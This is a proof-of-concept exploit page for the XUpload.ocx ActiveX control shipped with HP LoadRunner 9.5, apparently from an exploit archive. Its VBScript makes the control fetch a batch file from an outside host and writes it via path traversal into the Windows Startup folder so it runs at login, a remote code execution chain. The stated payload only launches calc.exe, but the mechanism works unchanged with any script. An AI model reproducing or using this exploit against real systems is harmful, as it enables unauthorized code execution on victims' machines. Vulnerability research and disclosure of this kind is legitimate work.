HP LoadRunner version 9.5 Persits.XUpload.2 control (XUpload.ocx) MakeHttpRequest() remote file creation proof of concept exploit.
768a53821af4fde79d580a63870f6f429503fd30279cee4a32400f9427e0122a
<!--
HP LoadRunner 9.5 Persits.XUpload.2 control (XUpload.ocx) MakeHttpRequest() remote file creation poc
(IE 8)
by Nine:Situations:Group::pyrokinesis
CLSID: {E87F6C8E-16C0-11D3-BEF7-009027438003}
Progid: Persits.XUpload.2
Binary Path: C:\Programmi\HP\LoadRunner\bin\XUpload.ocx
KillBitted: False
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): True
Safe For Scripting (IObjectSafety): True
-->
<html>
<object classid='clsid:E87F6C8E-16C0-11D3-BEF7-009027438003' id='XUPLOADLib' />
</object>
<script language='vbscript'>
' http://retrogod.altervista.org/sh_9232.txt , a batch script that starts calc.exe
XUPLOADLib.Server = "retrogod.altervista.org"
XUPLOADLib.Script = "sh_9232.txt"
' place it in the Startup folder, italian path, change for your os
Method=""
Params=""
Path="..\\..\\..\\Documents and Settings\All Users.WINDOWS\Menu Avvio\Programmi\Esecuzione automatica\\sh.cmd"
UserAgent=""
Headers=""
XUPLOADLib.MakeHttpRequest Method ,Params ,Path ,UserAgent ,Headers
</script>